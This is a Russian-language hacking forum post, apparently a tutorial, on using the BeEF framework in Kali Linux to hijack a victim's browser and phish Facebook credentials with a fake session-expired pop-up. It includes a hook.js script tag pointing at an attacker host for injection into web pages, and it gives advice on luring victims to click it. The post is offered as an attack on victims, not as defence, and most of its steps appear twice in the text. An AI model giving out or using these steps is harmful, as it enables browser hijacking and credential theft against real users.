.gif)
Biwshight
Опытный user
- Регистрация
- 3 Апр 2019
- Сообщения
- 172
- Реакции
- 1
Шаг 1: Установите Kali (если вы этого еще не сделали).
Первым шагом является загрузка и установка Kali Linux. Это можно сделать в виде автономной операционной системы, двойной загрузки с вашей системой Windows или Mac или на виртуальной машине внутри выбранной вами операционной системы. Нет, это не может быть сделано с Windows! Windows, несмотря на все свои сильные стороны и простоту использования, не является подходящей хакерской операционной системой.
В Kali есть приложение под названием Browser Exploitation Framework (BeEF). Он способен помочь вам взломать браузер жертвы и взять его под контроль. Как только вы контролируете их браузер, вы можете делать очень много вещей. Один из них заключается в том, чтобы обманным путем заставить пользователя выдать свои учетные данные Facebook, которые я покажу вам здесь.
Шаг 2: Откройте BeEF.
Запустите Kali, и вы должны увидеть экран, как показано ниже. Вы запускаете BeEF, щелкая на значок коровы слева от рабочего стола Kali.
Когда вы нажимаете на него, он запускает BeEF, открывая терминал.
BeEF - это приложение, которое работает в фоновом режиме на веб-сервере в вашей системе, к которому вы обращаетесь из браузера. После запуска BeEF откройте браузер IceWeasel, чтобы получить доступ к его интерфейсу. Вы можете войти в BeEF, используя имя пользователя beef и пароль beef.
Затем вас встретит экран «Getting Started» от BeEF.
Шаг 3: Подключить браузер жертвы.
Это самая важная - возможно, даже самая трудная часть - этого взлома. Вы должны заставить жертву щелкнуть по специально разработанной ссылке JavaScript, чтобы «зацепить» их браузер. Это может быть сделано бесчисленными способами.
Самый простой способ - просто вставить код на ваш сайт и побудить пользователя нажать на него. Это может быть сделано с помощью такого текста, как «Нажмите здесь для получения дополнительной информации» или «Нажмите здесь, чтобы посмотреть видео». Использовать ваше воображение.
Сценарий выглядит примерно так: Вставьте его в веб-страницу, и когда кто-то нажимает на него, у вас есть свой браузер! (Прокомментируйте ниже, если у вас есть какие-либо вопросы по этому поводу; вы также можете использовать MitMf для отправки кода пользователю, но для этого требуется больше навыков.)
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
Отсюда я буду предполагать, что вы «зацепили» браузер жертвы и готовы владеть им.
Шаг 4. Отправьте диалоговое окно пользователю.
Когда вы подключите браузер жертвы, его IP-адрес, а также значки операционной системы и типа браузера появятся на панели «Подключенные браузеры» слева. Здесь я просто использовал свой собственный браузер для демонстрации.
Если мы нажмем на подключенный браузер, он откроет интерфейс BeEF с правой стороны. Обратите внимание, что это дает нам детали браузера изначально. Он также предоставляет нам ряд вкладок. Для наших целей нас интересует вкладка «Commands».
Нажмите на вкладку «Commands», затем прокрутите вниз «Modules Tree», пока не дойдете до «Social Engineering», и щелкните, чтобы развернуть его. Здесь будут представлены многочисленные модули социальной инженерии. Нажмите «Pretty Theft», чтобы открыть окно «History Results Module» и «Pretty Theft».
Этот модуль позволяет отправить всплывающее окно в браузере пользователя. В нашем случае мы будем использовать диалоговое окно Facebook.
Если щелкнуть окно «Dialog Type», мы увидим, что этот модуль может создавать не только диалоговое окно Facebook, но также LinkedIn, Windows, YouTube, Yammer и универсальное диалоговое окно. Выберите тип диалога Facebook, затем нажмите кнопку «Execute» внизу.
Шаг 5: Диалоговое окно появляется в целевой системе.
Когда вы нажимаете «Execute» в BeEF, в браузере жертвы появляется диалоговое окно, подобное приведенному ниже. Он сообщает жертве, что срок их сеанса в Facebook истек, и им необходимо повторно ввести свои учетные данные.
Хотя вы можете с подозрением относиться к такому всплывающему окну, большинство пользователей будут доверять истечению срока их сессии в Facebook и просто введут свой адрес электронной почты и пароль.
Шаг 6: Соберите учетные данные.
Вернувшись в нашу систему через интерфейс BeEf, мы видим, что учетные данные появляются в окне «Command results». Жертва ввела свой адрес электронной почты "[email protected]" и свой пароль "sweetbippy", и они были захвачены и представлены вам в BeEF.
Если вы действительно полны решимости получить эти учетные данные Facebook, это, безусловно, можно сделать, и это только один из многих методов (но, вероятно, самый простой).
Первым шагом является загрузка и установка Kali Linux. Это можно сделать в виде автономной операционной системы, двойной загрузки с вашей системой Windows или Mac или на виртуальной машине внутри выбранной вами операционной системы. Нет, это не может быть сделано с Windows! Windows, несмотря на все свои сильные стороны и простоту использования, не является подходящей хакерской операционной системой.
В Kali есть приложение под названием Browser Exploitation Framework (BeEF). Он способен помочь вам взломать браузер жертвы и взять его под контроль. Как только вы контролируете их браузер, вы можете делать очень много вещей. Один из них заключается в том, чтобы обманным путем заставить пользователя выдать свои учетные данные Facebook, которые я покажу вам здесь.
Шаг 2: Откройте BeEF.
Запустите Kali, и вы должны увидеть экран, как показано ниже. Вы запускаете BeEF, щелкая на значок коровы слева от рабочего стола Kali.
Когда вы нажимаете на него, он запускает BeEF, открывая терминал.
BeEF - это приложение, которое работает в фоновом режиме на веб-сервере в вашей системе, к которому вы обращаетесь из браузера. После запуска BeEF откройте браузер IceWeasel, чтобы получить доступ к его интерфейсу. Вы можете войти в BeEF, используя имя пользователя beef и пароль beef.
Затем вас встретит экран «Getting Started» от BeEF.
Шаг 3: Подключить браузер жертвы.
Это самая важная - возможно, даже самая трудная часть - этого взлома. Вы должны заставить жертву щелкнуть по специально разработанной ссылке JavaScript, чтобы «зацепить» их браузер. Это может быть сделано бесчисленными способами.
Самый простой способ - просто вставить код на ваш сайт и побудить пользователя нажать на него. Это может быть сделано с помощью такого текста, как «Нажмите здесь для получения дополнительной информации» или «Нажмите здесь, чтобы посмотреть видео». Использовать ваше воображение.
Сценарий выглядит примерно так: Вставьте его в веб-страницу, и когда кто-то нажимает на него, у вас есть свой браузер! (Прокомментируйте ниже, если у вас есть какие-либо вопросы по этому поводу; вы также можете использовать MitMf для отправки кода пользователю, но для этого требуется больше навыков.)
<script src= "http://192.168.1.101:3000/hook.js” ; type= "text/javascript" ></script>
Отсюда я буду предполагать, что вы «зацепили» браузер жертвы и готовы владеть им.
Шаг 4. Отправьте диалоговое окно пользователю.
Когда вы подключите браузер жертвы, его IP-адрес, а также значки операционной системы и типа браузера появятся на панели «Подключенные браузеры» слева. Здесь я просто использовал свой собственный браузер для демонстрации.
Если мы нажмем на подключенный браузер, он откроет интерфейс BeEF с правой стороны. Обратите внимание, что это дает нам детали браузера изначально. Он также предоставляет нам ряд вкладок. Для наших целей нас интересует вкладка «Commands».
Нажмите на вкладку «Commands», затем прокрутите вниз «Modules Tree», пока не дойдете до «Social Engineering», и щелкните, чтобы развернуть его. Здесь будут представлены многочисленные модули социальной инженерии. Нажмите «Pretty Theft», чтобы открыть окно «History Results Module» и «Pretty Theft».
Этот модуль позволяет отправить всплывающее окно в браузере пользователя. В нашем случае мы будем использовать диалоговое окно Facebook.
Если щелкнуть окно «Dialog Type», мы увидим, что этот модуль может создавать не только диалоговое окно Facebook, но также LinkedIn, Windows, YouTube, Yammer и универсальное диалоговое окно. Выберите тип диалога Facebook, затем нажмите кнопку «Execute» внизу.
Шаг 5: Диалоговое окно появляется в целевой системе.
Когда вы нажимаете «Execute» в BeEF, в браузере жертвы появляется диалоговое окно, подобное приведенному ниже. Он сообщает жертве, что срок их сеанса в Facebook истек, и им необходимо повторно ввести свои учетные данные.
Хотя вы можете с подозрением относиться к такому всплывающему окну, большинство пользователей будут доверять истечению срока их сессии в Facebook и просто введут свой адрес электронной почты и пароль.
Шаг 6: Соберите учетные данные.
Вернувшись в нашу систему через интерфейс BeEf, мы видим, что учетные данные появляются в окне «Command results». Жертва ввела свой адрес электронной почты "[email protected]" и свой пароль "sweetbippy", и они были захвачены и представлены вам в BeEF.
Если вы действительно полны решимости получить эти учетные данные Facebook, это, безусловно, можно сделать, и это только один из многих методов (но, вероятно, самый простой).
